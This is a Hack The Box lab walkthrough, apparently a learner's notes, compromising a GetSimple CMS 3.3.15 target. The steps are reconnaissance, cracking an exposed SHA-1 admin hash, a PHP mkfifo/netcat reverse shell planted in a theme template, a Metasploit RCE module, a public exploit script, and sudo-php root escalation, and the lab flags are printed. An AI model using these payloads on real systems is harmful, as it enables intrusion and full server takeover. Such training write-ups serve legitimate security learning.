GETTING STARTED
Spawn the target, gain a foothold and submit the contents of the user.txt flag
root@htb:~$ sudo nmap -sV -sC -T4 10.129.42.249 -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
| 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin/
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
root@htb:~$ sudo nmap --script=vuln -T4 10.129.42.249 -p 22,80
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /admin/: Possible admin folder
| /admin/index.php: Possible admin folder
| /backups/: Backup folder w/ directory listing
| /robots.txt: Robots file
|_ /data/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
root@htb:~$ BROWSER > http://10.129.42.249/
Welcome to GetSimple!
Thank you for using GetSimple CMS. This is your homepage, so please change this text to be what you want.
root@htb:~$ BROWSER > http://10.129.42.249/admin/
username: ...
password: ...
* /admin/ page may be vulnerable to brute force attack
- same as /admin/index.php
root@htb:~$ BROWSER > http://10.129.42.249/backups/
Index of /backups
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[DIR] other/ 2024-03-12 13:05 -
[DIR] pages/ 2024-03-12 13:05 -
[DIR] users/ 2024-03-12 13:05 -
[DIR] zip/ 2024-03-12 13:05 -
Apache/2.4.41 (Ubuntu) Server at 10.129.42.249 Port 80
* /backups/ directory publicly accessible; might have credentials
- nothing interesting; empty directories
root@htb:~$ BROWSER > http://10.129.42.249/robots.txt
User-agent: *
Disallow: /admin/
root@htb:~$ BROWSER > http://10.129.42.249/data/
Index of /data
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[DIR] cache/ 2024-03-12 13:05 -
[DIR] other/ 2024-03-12 13:05 -
[DIR] pages/ 2024-03-12 13:05 -
[DIR] thumbs/ 2018-09-07 17:58 -
[DIR] uploads/ 2018-09-07 17:58 -
[DIR] users/ 2024-03-12 13:05 -
Apache/2.4.41 (Ubuntu) Server at 10.129.42.249 Port 80
#rummage through the publicly accessible files
root@htb:~$ BROWSER > http://10.129.42.249/data/users/
admin.xml
root@htb:~$ BROWSER > http://10.129.42.249/data/users/admin.xml
<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>[email protected]</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>
root@htb:~$ BROWSER > http://10.129.42.249/data/other/
authorization.xml
root@htb:~$ BROWSER > http://10.129.42.249/data/other/authorization.xml
<item>
<apikey>4f399dc72ff8e619e327800f851e9986</apikey>
</item>
root@htb:~$ BROWSER > http://10.129.42.249/data/cache/
Index of /data/cache
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[TXT] 2a4c6447379fba09620ba05582eb61af.txt 2021-02-09 09:49 109
[TXT] stylesheet.txt 2025-06-30 03:53 35K
Apache/2.4.41 (Ubuntu) Server at 10.129.42.249 Port 80
root@htb:~$ BROWSER > http://10.129.42.249/data/cache/2a4c6447379fba09620ba05582eb61af.txt
{"status":"0","latest":"3.3.16","your_version":"3.3.15","message":"You have an old version - please upgrade"}
root@htb:~$ BROWSER > http://10.129.42.249/admin/
username: admin
password: d033e22ae348aeb5660fc2140aec35850c4da997
* these credentials didn't work
METHOD 1: MAIN
root@htb:~$ BROWSER > http://10.129.42.249/admin/
username: admin
password: d033e22ae348aeb5660fc2140aec35850c4da997
* these credentials didn't work
root@htb:~$ BROWSER > chatGPT.com
input: https://chatgpt.com/
output: sha1("admin") = d033e22ae348aeb5660fc2140aec35850c4da997
root@htb:~$ BROWSER > http://10.129.42.249/admin/
username: admin
password: admin
root@htb:~$ BROWSER > http://10.129.42.249/admin/theme.php
Theme: innovation
Editing File: http://gettingstarted.htb/theme/Innovation/template.php
Input: <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.57 31337 >/tmp/f"); ?>
root@htb:~$ nc -nlvp 31337
root@htb:~$ curl http://10.129.42.249/theme/Innovation/template.php
root@htb:~$ nc ...
listening on [any] 31337 ...
connect to [10.10.14.57] from (UNKNOWN) [10.129.42.249] 4249
...
www-data@target:~$ ls /home
mrb3n
www-data@target:~$ ls /home/mrb3n
user.txt
www-data@target:~$ cat /home/mrb3n/user.txt
7002d65b149b0a4d19132a66feed21d8METHOD 2: METASPLOIT
root@oco:~$ msfconsole
...
//Configure Target Settings
[msf](Jobs:0 Agents:0) >> search exploit "GetSimple CMS"
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability
1 exploit/multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE
[msf](Jobs:0 Agents:0) >> use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) >> show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 209.151.155.117 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 GetSimpleCMS 3.3.15 and before
[msf](Jobs:0 Agents:0) >> set RHOSTS 10.129.42.249
RHOSTS => 10.129.42.249
[msf](Jobs:0 Agents:0) >> set RPORT 80
RPORT => 80
//Configure Payloads
[msf](Jobs:0 Agents:0) >> set LHOST 10.10.14.57
LHOST => 10.10.14.57
[msf](Jobs:0 Agents:0) >> set LPORT
LPORT => 4444
[msf](Jobs:0 Agents:0) >> exploit
[*] Started reverse TCP handler on 10.10.14.57:43213
[*] Sending stage (40004 bytes) to 10.129.42.249
[*] Meterpreter session 1 opened (10.10.14.57:43213 -> 10.129.42.249:46344) at 2025-06-30 19:08:08 -0500
(Meterpreter 1)(/var/www/html/theme) > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2024-03-12 08:05:24 -0500 mrb3n
(Meterpreter 1)(/var/www/html/theme) > ls /home/mrb3n/
100664/rw-rw-r-- 33 fil 2021-02-16 05:00:55 -0600 user.txt
(Meterpreter 1)(/var/www/html/theme) > cat /home/mrb3n/user.txt
7002d65b149b0a4d19132a66feed21d8METHOD 3: ALT
root@htb:~$ BROWSER > google.com
search: GetSimple CMS exploit
https://github.com/cybersecaware/GetSimpleCMS-RCE
root@htb:~$ git clone https://github.com/cybersecaware/GetSimpleCMS-RCE.git
root@htb:~$ cd GetSimpleCMS-RCE/
root@htb:~$ ls
GetSimpleCMS-RCE.py images LICENSE README.md
root@htb:~$ pip install requests beautifulsoup4
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: requests in /usr/local/lib/python3.11/dist-packages (2.32.3)
Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (4.11.2)
Requirement already satisfied: charset-normalizer<4,>=2 in /usr/lib/python3/dist-packages (from requests) (3.0.1)
Requirement already satisfied: idna<4,>=2.5 in /usr/lib/python3/dist-packages (from requests) (3.3)
Requirement already satisfied: urllib3<3,>=1.21.1 in /usr/lib/python3/dist-packages (from requests) (1.26.12)
Requirement already satisfied: certifi>=2017.4.17 in /usr/lib/python3/dist-packages (from requests) (2022.9.24)
* install the required libraries
root@htb:~$ python3 GetSimpleCMS-RCE.py
Created By: H088yHaX0R / (HTB - AKA: Marz0)
Works for GetSimpleCMS 3.3.15
Enter the target URL (e.g., http://gettingstarted.htb): http://10.129.42.249
Enter the command to execute: id
[+] GetSimpleCMS version 3315 detected.
[+] Theme edit successful!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Built-in CMDS
upload_file: Uploads a PHP file to the server using the provided cookie and nonce.
vulnerable: Checks if the target is vulnerable by attempting to access sensitive files.
exploit: Executes the exploit by performing the above steps and uploading a PHP payload.
...
root@htb:~$ python3 GetSimpleCMS-RCE.py
Enter the target URL (e.g., http://gettingstarted.htb): http://10.129.42.249
Enter the command to execute: ls /home
[+] GetSimpleCMS version 3315 detected.
[+] Theme edit successful!
mrb3n
root@htb:~$ python3 GetSimpleCMS-RCE.py
Enter the target URL (e.g., http://gettingstarted.htb): http://10.129.42.249
Enter the command to execute: ls /home/mrb3n
[+] GetSimpleCMS version 3315 detected.
[+] Theme edit successful!
user.txt
root@htb:~$ python3 GetSimpleCMS-RCE.py
Enter the target URL (e.g., http://gettingstarted.htb): http://10.129.42.249
Enter the command to execute: cat /home/mrb3n/user.txt
[+] GetSimpleCMS version 3315 detected.
[+] Theme edit successful!
7002d65b149b0a4d19132a66feed21d8After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag
root@htb:~$ sudo nmap -sV -sC -T4 10.129.42.249 -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
| 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin/
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
root@htb:~$ sudo nmap --script=vuln -T4 10.129.42.249 -p 22,80
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /admin/: Possible admin folder
| /admin/index.php: Possible admin folder
| /backups/: Backup folder w/ directory listing
| /robots.txt: Robots file
|_ /data/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
root@htb:~$ BROWSER > http://10.129.42.249/admin/
username: ...
password: ...
* /admin/ page may be vulnerable to brute force attack
- same as /admin/index.php
root@htb:~$ BROWSER > http://10.129.42.249/backups/
Index of /backups
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[DIR] other/ 2024-03-12 13:05 -
[DIR] pages/ 2024-03-12 13:05 -
[DIR] users/ 2024-03-12 13:05 -
[DIR] zip/ 2024-03-12 13:05 -
Apache/2.4.41 (Ubuntu) Server at 10.129.42.249 Port 80
* /backups/ directory publicly accessible; might have credentials
- nothing interesting; empty directories
root@htb:~$ BROWSER > http://10.129.42.249/robots.txt
User-agent: *
Disallow: /admin/
root@htb:~$ BROWSER > http://10.129.42.249/data/
Index of /data
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[DIR] cache/ 2024-03-12 13:05 -
[DIR] other/ 2024-03-12 13:05 -
[DIR] pages/ 2024-03-12 13:05 -
[DIR] thumbs/ 2018-09-07 17:58 -
[DIR] uploads/ 2018-09-07 17:58 -
[DIR] users/ 2024-03-12 13:05 -
Apache/2.4.41 (Ubuntu) Server at 10.129.42.249 Port 80
#rummage through the publicly accessible files
root@htb:~$ BROWSER > http://10.129.42.249/data/users/
admin.xml
root@htb:~$ BROWSER > http://10.129.42.249/data/users/admin.xml
<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>[email protected]</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>
root@htb:~$ BROWSER > http://10.129.42.249/data/other/
authorization.xml
root@htb:~$ BROWSER > http://10.129.42.249/data/other/authorization.xml
<item>
<apikey>4f399dc72ff8e619e327800f851e9986</apikey>
</item>
root@htb:~$ BROWSER > http://10.129.42.249/data/cache/
Index of /data/cache
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[TXT] 2a4c6447379fba09620ba05582eb61af.txt 2021-02-09 09:49 109
[TXT] stylesheet.txt 2025-06-30 03:53 35K
Apache/2.4.41 (Ubuntu) Server at 10.129.42.249 Port 80
root@htb:~$ BROWSER > http://10.129.42.249/data/cache/2a4c6447379fba09620ba05582eb61af.txt
{"status":"0","latest":"3.3.16","your_version":"3.3.15","message":"You have an old version - please upgrade"}
root@htb:~$ BROWSER > http://10.129.42.249/
Welcome to GetSimple!
Thank you for using GetSimple CMS. This is your homepage, so please change this text to be what you want.
...
This is your sidebar text. Please change me in Theme -> Edit Components
root@htb:~$ BROWSER > http://10.129.42.249/theme/
Index of /theme
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[DIR] Cardinal/ 2024-03-12 13:05 -
[DIR] Innovation/ 2024-03-12 13:05 -
[ ] QbzYvdmhzI.php 2025-07-01 00:38 30
[ ] TEcfNbyvomNFEPj.php 2025-07-01 00:38 30
[ ] VoMlzU.php 2025-07-01 00:38 30
[ ] YRTapJGYPLOz.php 2025-07-01 00:51 1.1K
Apache/2.4.41 (Ubuntu) Server at 10.129.202.254 Port 80
METHOD 1: MAIN
root@htb:~$ BROWSER > http://10.129.42.249/admin/
username: admin
password: d033e22ae348aeb5660fc2140aec35850c4da997
* these credentials didn't work
root@htb:~$ BROWSER > chatGPT.com
input: https://chatgpt.com/
output: sha1("admin") = d033e22ae348aeb5660fc2140aec35850c4da997
root@htb:~$ BROWSER > http://10.129.42.249/admin/
username: admin
password: admin
root@htb:~$ BROWSER > http://10.129.42.249/admin/theme.php
Theme: innovation
Editing File: http://gettingstarted.htb/theme/Innovation/template.php
Input: <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.57 31337 >/tmp/f"); ?>
root@htb:~$ nc -nlvp 31337
root@htb:~$ curl http://10.129.42.249/theme/Innovation/template.php
root@htb:~$ nc ...
listening on [any] 31337 ...
connect to [10.10.14.57] from (UNKNOWN) [10.129.42.249] 4249
...
www-data@target:~$ ls /home
mrb3n
www-data@target:~$ ls /home/mrb3n
user.txt
www-data@target:~$ cat /home/mrb3n/user.txt
7002d65b149b0a4d19132a66feed21d8#privilege escalation
www-data@target:~$ sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
#
www-data@target:~$ sudo /usr/bin/php -r "system('/bin/bash');"
whoami
root
find / -iname root.txt 2>/dev/null
/root/root.txt
cat /root/root.txt
f1fba6e9f71efb2630e6e34da6387842
* the -r allows the execution of PHP code directly from the command line,
without needing to wrap it in <?php ... ?> tagsMETHOD 2: METASPLOIT
root@oco:~$ msfconsole
...
//Configure Target Settings
[msf](Jobs:0 Agents:0) >> search exploit "GetSimple CMS"
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability
1 exploit/multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE
[msf](Jobs:0 Agents:0) >> use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) >> show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 209.151.155.117 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 GetSimpleCMS 3.3.15 and before
[msf](Jobs:0 Agents:0) >> set RHOSTS 10.129.42.249
RHOSTS => 10.129.42.249
[msf](Jobs:0 Agents:0) >> set RPORT 80
RPORT => 80
//Configure Payloads
[msf](Jobs:0 Agents:0) >> set LHOST 10.10.14.57
LHOST => 10.10.14.57
[msf](Jobs:0 Agents:0) >> set LPORT
LPORT => 4444
[msf](Jobs:0 Agents:0) >> exploit
[*] Started reverse TCP handler on 10.10.14.57:43213
[*] Sending stage (40004 bytes) to 10.129.42.249
[*] Meterpreter session 1 opened (10.10.14.57:43213 -> 10.129.42.249:46344) at 2025-06-30 19:08:08 -0500
(Meterpreter 1)(/var/www/html/theme) > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2024-03-12 08:05:24 -0500 mrb3n
(Meterpreter 1)(/var/www/html/theme) > ls /home/mrb3n/
100664/rw-rw-r-- 33 fil 2021-02-16 05:00:55 -0600 user.txt
(Meterpreter 1)(/var/www/html/theme) > cat /home/mrb3n/user.txt
7002d65b149b0a4d19132a66feed21d8(Meterpreter 1)(/var/www/html/theme) > upload /home/htb-ac-53539/GetSimpleCMS-RCE/LinEnum/LinEnum.sh /var/www/html/data/uploads/
[*] uploading : /home/htb-ac-53539/GetSimpleCMS-RCE/LinEnum/LinEnum.sh -> /var/www/html/data/uploads//LinEnum.sh
[*] uploaded : /home/htb-ac-53539/GetSimpleCMS-RCE/LinEnum/LinEnum.sh -> /var/www/html/data/uploads//LinEnum.sh
* upload location
- http://10.129.42.249/data/uploads/
- /var/www/html/data/uploads/
(Meterpreter 1)(/var/www/html/theme) > chmod 777 LinEnum.sh
(Meterpreter 1)(/var/www/html/theme) > ls
Listing: /var/www/html/data/uploads
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 1083 fil 2018-09-07 12:58:59 -0500 .htaccess
100777/rwxrwxrwx 46631 fil 2025-06-30 19:55:47 -0500 LinEnum.sh
(Meterpreter 1)(/var/www/html/data/uploads) > shell
target@target:~$ ...
./LinEnum.sh
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[-] Group memberships:
uid=1000(mrb3n) gid=1000(mrb3n) groups=1000(mrb3n),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
[-] It looks like we have some admin users:
uid=1000(mrb3n) gid=1000(mrb3n) groups=1000(mrb3n),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
[+] Possible sudo pwnage!
/usr/bin/php
target@target:~$ ...
CMD="/bin/bash"
sudo /usr/bin/php -r "system('$CMD');"
whoami
root
find / -iname root.txt 2>/dev/null
/root/root.txt
cat /root/root.txt
f1fba6e9f71efb2630e6e34da6387842
* the -r allows the execution of PHP code directly from the command line,
without needing to wrap it in <?php ... ?> tagsLast updated